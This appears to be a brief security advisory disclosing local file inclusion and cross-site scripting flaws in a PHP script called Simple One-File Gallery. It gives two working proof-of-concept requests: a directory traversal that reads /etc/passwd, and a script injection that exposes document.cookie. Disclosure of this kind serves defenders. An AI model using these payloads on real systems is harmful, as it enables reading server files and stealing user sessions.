Simple One-File Gallery suffers from local file inclusion and cross site scripting vulnerabilities.
4feb613dd583b4d8271756458f9ab29be34f28254f4ed8fd60d37927e6c4d673
local file include:
/gallery.php?f=../../../../../../../../../../../../etc/passwd
xss via php error :
/gallery.php?f=</textarea>'"><script>alert(document.cookie)</script>
regards laurent gaffiƩ